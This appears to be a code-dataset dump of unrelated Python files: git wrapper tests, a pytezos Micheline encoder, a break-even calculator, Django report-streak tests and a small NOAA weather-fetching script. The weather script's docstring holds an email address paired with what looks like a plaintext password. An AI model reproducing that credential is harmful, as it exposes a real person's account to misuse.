assert os.path.isfile(os.path.join(cloned_working_dir, 'test1.txt')) is True
assert os.path.isfile(os.path.join(cloned_working_dir, 'test2.txt')) is True
assert os.path.isfile(os.path.join(cloned_working_dir, 'test3.txt')) is False
git.pull()
# Make sure it pulled content
assert os.path.isfile(os.path.join(cloned_working_dir, 'test1.txt')) is True
assert os.path.isfile(os.path.join(cloned_working_dir, 'test2.txt')) is True
assert os.path.isfile(os.path.join(cloned_working_dir, 'test3.txt')) is True
# Delete temp dir
shutil.rmtree(scratch_working_dir)
def test_push(self, mock_initialized_remote):
"""Method to test pushing to a remote"""
cloned_working_dir = mock_initialized_remote[1]
# Get a clone of the remote repo
git = mock_initialized_remote[0]
assert len(git.repo.heads) == 1
assert len(git.repo.remotes["origin"].fetch()) == 2
assert len(git.repo.refs) == 5
# Make sure only master content
git.checkout("master")
assert os.path.isfile(os.path.join(cloned_working_dir, 'test1.txt')) is True
assert os.path.isfile(os.path.join(cloned_working_dir, 'test2.txt')) is False
# Add a file to master and commit
write_file(git, "test3.txt", "adding a new file Content", commit_msg="add commit")
git.push()
# Make sure it pushed by cloning again content
scratch_working_dir = os.path.join(tempfile.gettempdir(), uuid.uuid4().hex)
os.makedirs(scratch_working_dir)
config = {"backend": get_backend(), "working_directory": scratch_working_dir}
# Init the empty repo
git_updater = get_fs_class()(config)
git_updater.clone(mock_initialized_remote[3])
git_updater.checkout("master")
# Make sure it pulled content
assert os.path.isfile(os.path.join(cloned_working_dir, 'test1.txt')) is True
assert os.path.isfile(os.path.join(cloned_working_dir, 'test2.txt')) is False
assert os.path.isfile(os.path.join(cloned_working_dir, 'test3.txt')) is True
# Delete temp dir
shutil.rmtree(scratch_working_dir)
def test_push_tags(self, mock_initialized_remote):
"""Method to test pushing to a remote"""
cloned_working_dir = mock_initialized_remote[1]
# Get a clone of the remote repo
git = mock_initialized_remote[0]
assert len(git.repo.heads) == 1
assert len(git.repo.remotes["origin"].fetch()) == 2
assert len(git.repo.refs) == 5
# Add a file to master and commit
write_file(git, "test3.txt", "adding a new file Content", commit_msg="add commit")
git.push()
# Add a tag
git.create_tag("new_tag_1", "this is my test tag")
# Check, tag should not be pushed yet.
scratch_working_dir = os.path.join(tempfile.gettempdir(), uuid.uuid4().hex)
os.makedirs(scratch_working_dir)
config = {"backend": get_backend(), "working_directory": scratch_working_dir}
# Init the empty repo
git_updater = get_fs_class()(config)
git_updater.clone(mock_initialized_remote[3])
git_updater.checkout("master")
# Make sure it pulled content
assert os.path.isfile(os.path.join(cloned_working_dir, 'test1.txt')) is True
assert os.path.isfile(os.path.join(cloned_working_dir, 'test2.txt')) is False
assert os.path.isfile(os.path.join(cloned_working_dir, 'test3.txt')) is True
# Check tags
assert len(git_updater.list_tags()) == 1
assert git_updater.list_tags()[0]["name"] == "test_tag_1"
# Push Tag
git.push(tags=True)
# Fetch and check tags
git_updater.fetch()
assert len(git_updater.list_tags()) == 2
assert git_updater.list_tags()[0]["name"] == "new_tag_1"
# Delete temp dir
shutil.rmtree(scratch_working_dir)
def test_merge(self, mock_initialized_remote):
"""Method to test pushing to a remote"""
cloned_working_dir = mock_initialized_remote[1]
# Get a clone of the remote repo
git = mock_initialized_remote[0]
# Create and checkout a new branch
git.create_branch("future_branch")
git.checkout("future_branch")
# Add a file to future branch and commit
write_file(git, "test3.txt", "adding a new file Content", commit_msg="add commit")
# Make sure data is there
assert os.path.isfile(os.path.join(cloned_working_dir, 'test1.txt')) is True
assert os.path.isfile(os.path.join(cloned_working_dir, 'test2.txt')) is False
assert os.path.isfile(os.path.join(cloned_working_dir, 'test3.txt')) is True
# Checkout master
git.checkout("master")
# New file shouldn't be there
assert os.path.isfile(os.path.join(cloned_working_dir, 'test1.txt')) is True
assert os.path.isfile(os.path.join(cloned_working_dir, 'test2.txt')) is False
assert os.path.isfile(os.path.join(cloned_working_dir, 'test3.txt')) is False
# Merge future branch into master
git.merge("future_branch")
# New file should be there
assert os.path.isfile(os.path.join(cloned_working_dir, 'test1.txt')) is True
assert os.path.isfile(os.path.join(cloned_working_dir, 'test2.txt')) is False
assert os.path.isfile(os.path.join(cloned_working_dir, 'test3.txt')) is True
def test_discard_changes(self, mock_initialized):
"""Test discarding all changes in a repo"""
git = mock_initialized[0]
working_directory = mock_initialized[1]
# Create file
write_file(git, "test_add1.txt", "entry 1", commit_msg="adding file 1")
write_file(git, "test_add2.txt", "entry 2", commit_msg="adding file 2")
# Verify Clean
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 0
# Edit both files
write_file(git, "test_add1.txt", "entry 1 updated", add=False)
write_file(git, "test_add2.txt", "entry 2 updated", add=False)
# Verify Edits exist
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 2
assert len(status["untracked"]) == 0
# Discard Single file change changes
git.discard_changes("test_add2.txt")
# Verify Edits gone
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 1
assert status["unstaged"][0][0] == "test_add1.txt"
assert len(status["untracked"]) == 0
# Edit both files again
write_file(git, "test_add1.txt", "entry 1 updated", add=False)
write_file(git, "test_add2.txt", "entry 2 updated", add=False)
# Verify Edits exist
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 2
assert len(status["untracked"]) == 0
# Discard All changes
git.discard_changes()
# Verify Edits gone
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 0
def test_add_submodule(self, mock_initialized_remote):
"""Method to test pushing to a remote"""
remote_working_dir = mock_initialized_remote[3]
# Create a new repo
scratch_working_dir = os.path.join(tempfile.gettempdir(), uuid.uuid4().hex)
os.makedirs(scratch_working_dir)
config = {"backend": get_backend(), "working_directory": scratch_working_dir}
git = get_fs_class()(config)
git.initialize()
write_file(git, "blah.txt", "blaaah", commit_msg="First commit")
# List submodules
assert len(git.list_submodules()) == 0
# Add a submodule
git.add_submodule("test_sub", "test", remote_working_dir)
# List submodules
assert len(git.list_submodules()) == 1
sm = git.list_submodules()[0]
assert sm["name"] == "test_sub"
assert sm["url"] == remote_working_dir
assert sm["branch"] == "master"
# Should be clean
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 0
assert os.path.isfile(os.path.join(scratch_working_dir, "test", 'test1.txt')) is True
# Delete temp dir
shutil.rmtree(scratch_working_dir)
def test_remove_submodule(self, mock_initialized_remote):
"""Method to test pushing to a remote"""
remote_working_dir = mock_initialized_remote[3]
# Create a new repo
scratch_working_dir = os.path.join(tempfile.gettempdir(), uuid.uuid4().hex)
os.makedirs(scratch_working_dir)
config = {"backend": get_backend(), "working_directory": scratch_working_dir}
git = get_fs_class()(config)
git.initialize()
write_file(git, "blah.txt", "blaaah", commit_msg="First commit")
# List submodules
assert len(git.list_submodules()) == 0
# Add a submodule
git.add_submodule("test_sub", "test", remote_working_dir)
# List submodules
assert len(git.list_submodules()) == 1
sm = git.list_submodules()[0]
assert sm["name"] == "test_sub"
assert sm["url"] == remote_working_dir
assert sm["branch"] == "master"
# Should be clean
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 0
assert os.path.isfile(os.path.join(scratch_working_dir, "test", 'test1.txt')) is True
# Delete the submodule reference
git.remove_submodules("test_sub")
# Should be clean and data should be gone
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 0
assert os.path.isfile(os.path.join(scratch_working_dir, "test", 'test1.txt')) is False
# Delete temp dir
shutil.rmtree(scratch_working_dir)
| 37.968708 | 138 | 0.628172 |
d00f49e92d6e31dd9476628571c27cc57d9d9bf4 | 70 | py | Python | tests/RME/__init__.py | UofU-Cryosphere/weather_forecast_retrieval | b06fe2e09b49ace9eba55bf424c1b2d1e358858c | ["CC0-1.0"] | 6 | 2017-12-20T22:42:24.000Z | 2021-08-07T03:32:27.000Z | tests/RME/__init__.py | UofU-Cryosphere/weather_forecast_retrieval | b06fe2e09b49ace9eba55bf424c1b2d1e358858c | ["CC0-1.0"] | 26 | 2019-03-07T17:47:13.000Z | 2021-06-25T15:43:27.000Z | tests/RME/__init__.py | UofU-Cryosphere/weather_forecast_retrieval | b06fe2e09b49ace9eba55bf424c1b2d1e358858c | ["CC0-1.0"] | 3 | 2019-03-08T07:28:59.000Z | 2021-02-12T21:59:12.000Z |
from .RME_test_case import RMETestCase
__all__ = [
'RMETestCase'
]
| 11.666667 | 38 | 0.742857 |
c5256733b825192d80bddd8f6ad0ecea8e00975a | 114 | py | Python | utils/nn_utils.py | isse-augsburg/adaptive-spreading | 3e423f888ff07257111fc95c3276024c4c44036d | ["MIT"] | null | null | null | utils/nn_utils.py | isse-augsburg/adaptive-spreading | 3e423f888ff07257111fc95c3276024c4c44036d | ["MIT"] | null | null | null | utils/nn_utils.py | isse-augsburg/adaptive-spreading | 3e423f888ff07257111fc95c3276024c4c44036d | ["MIT"] | null | null | null |
def count_trainable_parameters(model):
return sum(p.numel() for p in model.parameters() if p.requires_grad)
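# Illustrative usage (added; not part of the original file). Assuming a PyTorch
# model, since `model.parameters()` and `p.numel()` match the torch.nn API:
#   import torch.nn as nn
#   model = nn.Sequential(nn.Linear(10, 5), nn.ReLU(), nn.Linear(5, 1))
#   count_trainable_parameters(model)  # 10*5 + 5 + 5*1 + 1 = 61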
| 22.8 | 72 | 0.754386 |
0c2f399d296a66003bde4226e83d80fd01902ae5 | 15,579 | py | Python | pytezos/michelson/micheline.py | juztin/pytezos-1 | 7e608ff599d934bdcf129e47db43dbdb8fef9027 | ["MIT"] | null | null | null | pytezos/michelson/micheline.py | juztin/pytezos-1 | 7e608ff599d934bdcf129e47db43dbdb8fef9027 | ["MIT"] | null | null | null | pytezos/michelson/micheline.py | juztin/pytezos-1 | 7e608ff599d934bdcf129e47db43dbdb8fef9027 | ["MIT"] | null | null | null |
from typing import Dict
from datetime import datetime
from os.path import join
from decimal import Decimal
from collections import namedtuple, defaultdict
from functools import lru_cache
from pytezos.encoding import forge_public_key, forge_address, forge_base58
from pytezos.michelson.formatter import micheline_to_michelson
from pytezos.michelson.grammar import MichelsonParser
from pytezos.repl.parser import parse_expression, dispatch_core_map
Nested = namedtuple('Nested', ['prim', 'args'])
Schema = namedtuple('Schema', ['metadata', 'bin_types', 'bin_names', 'json_to_bin'])
class Pair(tuple):
pass
@lru_cache(maxsize=None)
def michelson_parser():
return MichelsonParser()
def skip_nones(**kwargs) -> dict:
return {k: v for k, v in kwargs.items() if v is not None}
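# For example (added for clarity, derived from the comprehension above):
#   skip_nones(prim='pair', typename=None, fieldname='owner')
#   == {'prim': 'pair', 'fieldname': 'owner'}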
def encode_literal(value, prim, binary=False):
core_type = 'string'
if prim in ['int', 'nat', 'big_map']:
core_type = 'int'
elif prim == 'timestamp':
if isinstance(value, int):
core_type = 'int'
elif isinstance(value, datetime):
value = value.strftime('%Y-%m-%dT%H:%M:%SZ')
elif prim == 'mutez':
core_type = 'int'
if isinstance(value, Decimal):
value = int(value * 10 ** 6)
elif prim == 'bool':
core_type = 'prim'
value = 'True' if value else 'False'
elif prim == 'bytes':
core_type = 'bytes'
if isinstance(value, bytes):
value = value.hex()
elif prim == 'key' and binary:
core_type = 'bytes'
value = forge_public_key(value).hex()
elif prim in ['address', 'contract', 'key_hash'] and binary:
core_type = 'bytes'
value = forge_address(value, tz_only=prim == 'key_hash').hex()
elif prim == 'chain_id': # and binary ?
core_type = 'bytes'
value = forge_base58(value).hex()
return {core_type: str(value)}
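# A few concrete outputs of encode_literal (added for clarity, derived from the
# branches above):
#   encode_literal(42, 'nat')         == {'int': '42'}
#   encode_literal(True, 'bool')      == {'prim': 'True'}
#   encode_literal('hello', 'string') == {'string': 'hello'}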
def get_flat_nested(nested: Nested):
flat_args = list()
for arg in nested.args:
if isinstance(arg, Nested) and arg.prim == nested.prim:
flat_args.extend(get_flat_nested(arg))
else:
flat_args.append(arg)
return flat_args
def collapse_micheline(code) -> dict:
metadata = dict()
def get_annotation(x, prefix, default=None):
return next((a[1:] for a in x.get('annots', []) if a[0] == prefix), default)
def parse_node(node, path='0', parent_prim=None, inherited_name=None):
if node['prim'] in ['storage', 'parameter']:
return parse_node(node['args'][0])
fieldname = get_annotation(node, '%')
typename = get_annotation(node, ':')
metadata[path] = skip_nones(
prim=node['prim'],
typename=typename,
fieldname=fieldname,
inherited_name=inherited_name
)
if node['prim'] == 'option':
return parse_node(
node=node['args'][0],
path=path + '0',
parent_prim=parent_prim,
inherited_name=fieldname
)
elif node['prim'] in ['lambda', 'contract']:
metadata[path]['parameter'] = micheline_to_michelson(node['args'][0], inline=True)
return dict(path=path, args=[]) # stop there
args = [
parse_node(arg, path=path + str(i), parent_prim=node['prim'])
for i, arg in enumerate(node.get('args', []))
]
if node['prim'] in ['pair', 'or']:
res = Nested(node['prim'], args)
is_struct = node['prim'] == 'pair' and (typename or fieldname or inherited_name)
if is_struct or parent_prim != node['prim']:
args = get_flat_nested(res)
else:
return res
if args:
metadata[path]['args'] = list(map(lambda x: x['path'], args))
return dict(path=path, args=args)
parse_node(code)
return metadata
def build_maps(metadata: dict):
bin_types = {k: v['prim'] for k, v in metadata.items()}
bin_names, json_to_bin = {}, {}
def is_unit(bin_path):
node = metadata[bin_path]
return node.get('prim') == 'unit'
def get_union_names(node):
names = []
for i, arg_path in enumerate(node['args']):
arg = metadata[arg_path]
name = arg.get('inherited_name', arg.get('fieldname', arg.get('typename')))
if name:
name = name.replace('_Liq_entry_', '')
else:
name = f'entrypoint_{i}'
names.append(name)
return names
def get_tuple_names(node):
names, unnamed = [], True
for i, arg_path in enumerate(node['args']):
arg = metadata[arg_path]
name = arg.get('typename', arg.get('fieldname', arg.get('inherited_name')))
if name and name not in names:
unnamed = False
else:
name = f'{arg["prim"]}_{i}'
names.append(name)
return names, unnamed
def parse_node(bin_path='0', json_path='/'):
node = metadata[bin_path]
if node['prim'] in ['list', 'set']:
parse_node(node['args'][0], join(json_path, '{}'))
elif node['prim'] in ['map', 'big_map']:
key_node = metadata[bin_path + '0']
if key_node['prim'] == 'pair':
bin_types[bin_path + '0'] = 'keypair'
parse_node(node['args'][1], join(json_path, '{}'))
elif node['prim'] == 'or':
names = get_union_names(node)
if all(map(is_unit, node['args'])):
bin_types[bin_path] = 'enum'
for i, arg_path in enumerate(node['args']):
parse_node(arg_path, join(json_path, names[i]))
bin_types[arg_path] = names[i]
bin_names[arg_path] = names[i]
else:
bin_types[bin_path] = 'router'
for i, arg_path in enumerate(node['args']):
parse_node(arg_path, join(json_path, names[i]))
bin_names[arg_path] = names[i]
elif node['prim'] == 'pair':
names, unnamed = get_tuple_names(node)
bin_types[bin_path] = 'tuple' if unnamed else 'namedtuple'
for i, arg_path in enumerate(node['args']):
parse_node(arg_path, join(json_path, str(i) if unnamed else names[i]))
bin_names[arg_path] = None if unnamed else names[i]
json_to_bin[json_path] = bin_path
parse_node()
return bin_types, bin_names, json_to_bin
def parse_micheline(val_expr, type_expr, schema: Schema, bin_root='0'):
def flatten_pair(args) -> Pair:
res = list()
for arg in args:
if isinstance(arg, Pair):
res.extend(flatten_pair(arg))
else:
res.append(arg)
return Pair(res)
def decode_selector(val_node, type_node, val, type_path):
bin_type = schema.bin_types[type_path]
if bin_type == 'map':
return dict(val)
elif bin_type == 'big_map':
return dict(val) if isinstance(val_node, list) else val
elif bin_type == 'option':
return val[0] if val is not None else None
elif bin_type == 'pair':
return flatten_pair(val)
elif bin_type == 'tuple':
return list(flatten_pair(val))
elif bin_type == 'keypair':
return tuple(flatten_pair(val))
elif bin_type == 'namedtuple':
names = list(map(lambda x: schema.bin_names[x], schema.metadata[type_path]['args']))
return dict(zip(names, flatten_pair(val)))
elif bin_type in ['or', 'router', 'enum']:
arg_path = type_path + {'Left': '0', 'Right': '1'}[val_node['prim']]
if schema.bin_types[arg_path] == 'option':
arg_path += '0'
is_leaf = schema.metadata[arg_path]['prim'] != 'or'
res = {schema.bin_names[arg_path]: val[0]} if is_leaf else val[0]
return next(iter(res)) if bin_type == 'enum' else res
elif bin_type == 'unit':
return None
elif bin_type == 'lambda':
return micheline_to_michelson(val)
elif bin_type == 'timestamp':
return dispatch_core_map(val_node, {'string': str, 'int': int})
elif bin_type == 'bytes':
return val.hex()
elif bin_type == 'mutez':
return Decimal(val) / 10 ** 6
else:
return val
if type_expr['prim'] in ['storage', 'parameter']:
type_expr = type_expr['args'][0]
for idx in bin_root[1:]:
type_expr = type_expr['args'][int(idx)]
return parse_expression(val_expr, type_expr, decode_selector, bin_root)
def parse_json(data, schema: Schema, bin_root='0'):
bin_values = defaultdict(dict) # type: Dict[str, dict]
def parse_entry(bin_path, index):
for i in range(len(bin_path) - 1, 0, -1):
lpath = bin_path[:i]
if schema.bin_types[lpath] in ['or', 'router', 'enum']:
bin_values[lpath][index] = bin_path[i]
elif schema.bin_types[lpath] in ['list', 'set', 'map', 'big_map']:
return
def parse_comparable(key, bin_path, index):
if schema.bin_types[bin_path] == 'keypair':
assert isinstance(key, tuple), f'tuple expected, got {key}'
for i, arg_path in enumerate(schema.metadata[bin_path]['args']):
assert i < len(key), f'not enough elements in tuple {key}'
bin_values[arg_path][index] = key[i]
else:
bin_values[bin_path][index] = key
def parse_node(node, json_path, index='0'):
bin_path = schema.json_to_bin[json_path]
bin_type = schema.bin_types[bin_path]
if isinstance(node, dict):
if bin_type in ['map', 'big_map']:
bin_values[bin_path][index] = str(len(node))
parse_entry(bin_path, index)
for i, (key, value) in enumerate(node.items()):
parse_comparable(key, bin_path=bin_path + '0', index=f'{index}:{i}')
parse_node(value, json_path=join(json_path, '{}'), index=f'{index}:{i}')
elif bin_type in ['pair', 'or', 'namedtuple', 'router']:
for key, value in node.items():
parse_node(value, json_path=join(json_path, key), index=index)
else:
assert False, (node, bin_type)
elif isinstance(node, list):
if bin_type in ['list', 'set']:
bin_values[bin_path][index] = str(len(node))
parse_entry(bin_path, index)
for i, value in enumerate(node):
parse_node(value, json_path=join(json_path, '{}'), index=f'{index}:{i}')
elif bin_type in ['pair', 'tuple']:
for i, value in enumerate(node):
parse_node(value, json_path=join(json_path, str(i)), index=index)
elif bin_type == 'lambda':
bin_values[bin_path][index] = node
elif bin_type == 'or':
assert False, (node, bin_path) # must be at least lr encoded
else:
if bin_type == 'enum':
parse_node(node, json_path=join(json_path, node), index=index)
else:
bin_values[bin_path][index] = node
parse_entry(bin_path, index)
if schema.bin_types[bin_root] == 'option':
bin_root += '0'
json_root = next((k for k, v in schema.json_to_bin.items() if v == bin_root), None)
if json_root:
parse_node(data, json_root)
else:
parse_comparable(data, bin_root, index='0')
return dict(bin_values)
def make_micheline(bin_values: dict, bin_types: dict, bin_root='0', binary=False):
def encode_node(bin_path, index='0'):
bin_type = bin_types[bin_path]
value = bin_values[bin_path][index] if bin_path in bin_values else None
optional = len(bin_path) > 1 and bin_types[bin_path[:-1]] == 'option'
if optional and not any(filter(
lambda x: x.startswith(bin_path) and bin_values[x][index] is not None, bin_values)):
# TODO: unit???
return dict(prim='None')
if bin_type == 'option':
return encode_node(bin_path + '0', index)
if bin_type in ['pair', 'tuple', 'keypair', 'namedtuple']:
assert value is None
res = dict(
prim='Pair',
args=list(map(lambda x: encode_node(bin_path + x, index), '01'))
)
elif bin_type in ['map', 'big_map']:
assert value is not None
if isinstance(value, int):
assert bin_type == 'big_map'
res = encode_literal(value, bin_type)
else:
res = [dict(prim='Elt',
args=[encode_node(bin_path + '0', f'{index}:{i}'),
encode_node(bin_path + '1', f'{index}:{i}')])
for i in range(int(value or '0'))]
elif bin_type in ['set', 'list']:
assert value is not None
res = [encode_node(bin_path + '0', f'{index}:{i}')
for i in range(int(value or '0'))]
elif bin_type in ['or', 'router', 'enum']:
assert value is not None
res = dict(prim={'0': 'Left', '1': 'Right'}[value],
args=[encode_node(bin_path + value, index)])
elif bin_type == 'lambda':
assert value is not None
res = michelson_to_micheline(bin_values[bin_path][index])
elif bin_type == 'unit':
res = dict(prim='Unit')
else:
assert value is not None
if value == bin_type:
res = dict(prim='Unit')
else:
res = encode_literal(value, bin_type, binary)
if optional:
return dict(prim='Some', args=[res])
else:
return res
return encode_node(bin_root)
def make_default(bin_types: dict, root='0'):
def encode_node(bin_path):
bin_type = bin_types[bin_path]
if bin_type == 'option':
return dict(prim='None')
elif bin_type in ['pair', 'tuple', 'namedtuple']:
return dict(
prim='Pair',
args=list(map(lambda x: encode_node(bin_path + x), '01'))
)
elif bin_type in ['map', 'big_map', 'set', 'list']:
return []
elif bin_type in ['int', 'nat', 'mutez', 'timestamp']:
return {'int': '0'}
elif bin_type in ['string', 'bytes']:
return {'string': ''}
elif bin_type == 'bool':
return {'prim': 'False'}
elif bin_type == 'unit':
return {'prim': 'Unit'}
else:
raise ValueError(f'Cannot create default value for `{bin_type}` at `{bin_path}`')
return encode_node(root)
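# Example (added for clarity): given a binary type map such as
# {'0': 'tuple', '00': 'nat', '01': 'string'} (a pair of nat and string),
# make_default(bin_types) returns
#   {'prim': 'Pair', 'args': [{'int': '0'}, {'string': ''}]}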
def michelson_to_micheline(data, parser=None):
"""
Converts michelson source text into Micheline expression
:param data: Michelson string
:param parser: custom Michelson parser
:return: Micheline expression
"""
if parser is None:
parser = michelson_parser()
if data[0] == '(' and data[-1] == ')':
data = data[1:-1]
return parser.parse(data)
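# Illustrative conversion (added; the exact dict shape is an approximation
# hand-checked against the parser's Micheline conventions, not taken from the
# original file):
#   michelson_to_micheline('Pair 1 "foo"')
#   # ≈ {'prim': 'Pair', 'args': [{'int': '1'}, {'string': 'foo'}]}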
def is_optional(schema, bin_path):
return len(bin_path) > 1 and schema.bin_types[bin_path[:-1]] == 'option'
| 36.314685 | 100 | 0.554978 |
990296b3be357c15f0c87a6a18ea2e562b92a93c | 478 | py | Python | OM300Ch7.py | JoshChima/OM300_Mastered | db17c8ca1eb1045b8b96fde34f193767d038629f | ["MIT"] | null | null | null | OM300Ch7.py | JoshChima/OM300_Mastered | db17c8ca1eb1045b8b96fde34f193767d038629f | ["MIT"] | null | null | null | OM300Ch7.py | JoshChima/OM300_Mastered | db17c8ca1eb1045b8b96fde34f193767d038629f | ["MIT"] | null | null | null |
import numpy as np
import pandas as pd
BEP = lambda fcX, fcY, vcX, vcY: (fcY - fcX)/(vcY-vcX)
TotCost = lambda fc,vc,nu: fc+(vc*nu)
Profit = lambda fc,vc,nu,ppu: ppu*nu-TotCost(fc,vc,nu)
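# Worked example (added for clarity): these lambdas encode the usual
# cost-volume relations. TotCost(83000, 1.15, 110000) = 83000 + 1.15*110000
# = 209500, so Profit(83000, 1.15, 110000, 2.3) = 2.3*110000 - 209500 = 43500.
# Note that BEP as written divides by (vcY - vcX); the crossover quantity where
# fcX + vcX*n == fcY + vcY*n is n = (fcY - fcX)/(vcX - vcY), so the sign of the
# result depends on the argument order used in the calls below.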
GPEbe = BEP(150000,200000,18,14)
FMSbe = BEP(200000,480000,14,13)
DMbe = BEP(480000, 200000, 13, 14)
Miy = BEP(65000,26000,12.5,18.5)
print(GPEbe)
print(FMSbe)
print(DMbe)
print(Miy)
print(Profit(83000,1.15,110000,2.3))
print(Profit(41000,1.5,110000,2.3))
print(TotCost(26000,18,365*50))
| 23.9 | 54 | 0.700837 |
50e77822ba329f7da4568ea683c46b0afa2c316f | 4,158 | py | Python | remo/reports/tests/test_util.py | Mozilla-GitHub-Standards/6f6b18ac63685c6bf60fff95a3bbcc598378c77ceb14c7404172c570dd1e971d | 23ca8d46496b491fbdb2b8a72c91e75372932f23 | ["BSD-3-Clause"] | 27 | 2015-01-02T18:47:56.000Z | 2021-08-14T11:48:24.000Z | remo/reports/tests/test_util.py | Mozilla-GitHub-Standards/6f6b18ac63685c6bf60fff95a3bbcc598378c77ceb14c7404172c570dd1e971d | 23ca8d46496b491fbdb2b8a72c91e75372932f23 | ["BSD-3-Clause"] | 450 | 2015-01-02T12:29:50.000Z | 2020-10-27T21:41:38.000Z | remo/reports/tests/test_util.py | Mozilla-GitHub-Standards/6f6b18ac63685c6bf60fff95a3bbcc598378c77ceb14c7404172c570dd1e971d | 23ca8d46496b491fbdb2b8a72c91e75372932f23 | ["BSD-3-Clause"] | 81 | 2015-01-10T23:59:32.000Z | 2021-08-19T17:08:56.000Z |
from datetime import timedelta
from django.core.urlresolvers import reverse
from django.utils.timezone import now
import mock
from nose.tools import eq_, ok_
from remo.base.templatetags.helpers import urlparams
from remo.base.tests import RemoTestCase
from remo.base.utils import month2number
from remo.profiles.tests import UserFactory
from remo.reports.tests import NGReportFactory
from remo.reports.utils import count_user_ng_reports, get_last_report
class TestUserCommitedReports(RemoTestCase):
"""Tests for count_user_ng_reports utility."""
def test_current_streak(self):
user = UserFactory.create()
# Add a report for each of the last 4 days (4 reports)
for i in range(0, 4):
NGReportFactory.create(user=user,
report_date=(now().date()
- timedelta(days=i)))
eq_(count_user_ng_reports(user, current_streak=True), 4)
def test_longest_streak(self):
user = UserFactory.create()
past_day = now().date() - timedelta(days=30)
# Add 7 continuous reports somewhere in the past
for i in range(0, 7):
NGReportFactory.create(user=user,
report_date=(past_day - timedelta(days=i)))
# Add a report, one each day for the last 3 days (3 reports)
for i in range(0, 3):
NGReportFactory.create(user=user,
report_date=(now().date()
- timedelta(days=i)))
eq_(count_user_ng_reports(user, longest_streak=True), 7)
def test_get_last_two_weeks_reports(self):
user = UserFactory.create()
# Add 4 reports more than a day apart
for i in range(8, 0, -2):
NGReportFactory.create(user=user,
report_date=(now().date()
- timedelta(days=i)))
# Get the reports added in the last two weeks
eq_(count_user_ng_reports(user, period=2), 4)
def test_get_last_ten_weeks_reports(self):
user = UserFactory.create()
# Add 4 reports more than a day apart
for i in range(8, 0, -2):
NGReportFactory.create(user=user,
report_date=(now().date()
- timedelta(days=i)))
# Get the reports added in the last 10 weeks
eq_(count_user_ng_reports(user, period=10), 4)
class Month2NumberTest(RemoTestCase):
@mock.patch('remo.reports.views.month2number', wraps=month2number)
def test_base(self, mocked_month2number):
user = UserFactory.create(groups='Rep')
reports_url = reverse('list_ng_reports_rep',
args=(user.userprofile.display_name,))
reports_url = urlparams(reports_url, year='2014', month='Apri')
response = self.client.get(reports_url, follow=True)
mocked_month2number.assert_called_once_with(u'Apri')
eq_(response.status_code, 404)
class GetUserLastReportTest(RemoTestCase):
"""Test get last report date helper."""
def test_get_last_report_past(self):
report_date = now().date() - timedelta(weeks=5)
user = UserFactory.create(groups=['Rep'])
NGReportFactory.create(user=user, report_date=report_date)
eq_(get_last_report(user).report_date, report_date)
def test_get_last_report_future(self):
past_date = now().date() - timedelta(weeks=5)
future_date = now().date() + timedelta(weeks=2)
user = UserFactory.create(groups=['Rep'])
NGReportFactory.create(user=user, report_date=past_date)
NGReportFactory.create(user=user, report_date=future_date)
eq_(get_last_report(user).report_date, past_date)
def test_last_report_date_none(self):
user = UserFactory.create(groups=['Rep'])
ok_(not get_last_report(user))
future_date = now().date() + timedelta(weeks=2)
NGReportFactory.create(user=user, report_date=future_date)
ok_(not get_last_report(user))
| 41.58
| 78
| 0.626263
|
a9ae97f5867a1dd53a79283681048adfd98b461c
| 2,050
|
py
|
Python
|
weather_app.py
|
rucsoft/weather
|
ad522c3688ebe4eeaaa671f2bdf3dcff9c2cabf2
|
[
"MIT"
] | null | null | null |
weather_app.py
|
rucsoft/weather
|
ad522c3688ebe4eeaaa671f2bdf3dcff9c2cabf2
|
[
"MIT"
] | null | null | null |
weather_app.py
|
rucsoft/weather
|
ad522c3688ebe4eeaaa671f2bdf3dcff9c2cabf2
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
import datetime
import matplotlib.pyplot as plt  # pyplot is the module conventionally aliased as plt
import scrapy
import requests
import lxml.etree  # import the submodule explicitly so lxml.etree.fromstring() below works
from io import StringIO, BytesIO
today=(datetime.date.today()+datetime.timedelta(1)).isoformat()
tomorrow=(datetime.date.today()+datetime.timedelta(2)).isoformat()
'''rucsoft@gmail.com Rucsoft5^'''
class person:
def __init__(self,email):
self.email=email
self.zipcodes=[]
def add_location(self,zipcode):
self.zipcodes.append(zipcode)
def show_locations(self):
print(self.zipcodes)
def create_zip(zip_array):
useful_ziplist = ''
for i in range(0,len(zip_array)):
if i == len(zip_array)-1:
useful_ziplist = useful_ziplist+str(zip_array[i])
else:
useful_ziplist= useful_ziplist + str(zip_array[i]) + '+'
return useful_ziplist
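# Illustration (hypothetical zip codes): create_zip([70605, 48316]) returns '70605+48316',
# i.e. the codes joined by '+' as required by the NDFD zipCodeList query parameter used below.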
'''
def get_weather_data(zip_array, today, tomorrow):
str_zipcode= create_zip(zip_array)
xml= 'http://graphical.weather.gov/xml/sample_products/browser_interface/ndfdXMLclient.php?zipCodeList='+str_zipcode+'&product=time-series&begin=' + today + 'T00:00:00&end=' + tomorrow + 'T00:00:00&maxt=maxt&mint=mint&pop12=pop12'
page = requests.get(xml)
tree = lxml.etree.fromstring(page.content)
for i in range(0, len(zip_array)):
        find_text = tree.xpath('//data/parameters[' + str(i + 1) + ']//*')
for j in range(0, len(find_text)):
'''
paul=person('ggg')
paul.add_location(70605)
paul.add_location(48316)
xml_zipcode = create_zip(paul.zipcodes)
xml= 'http://graphical.weather.gov/xml/sample_products/browser_interface/ndfdXMLclient.php?zipCodeList='+xml_zipcode+'&product=time-series&begin=' + today + 'T00:00:00&end=' + tomorrow + 'T00:00:00&maxt=maxt&mint=mint&pop12=pop12'
page = requests.get(xml)
tree = lxml.etree.fromstring(page.content)
find_text = tree.xpath('//data/parameters[1]//*')
find_text3 = tree.xpath('//data/parameters[1]//value')
find_text2 = tree.xpath('//data/parameters[1]//name')
| 30.147059
| 234
| 0.685854
|
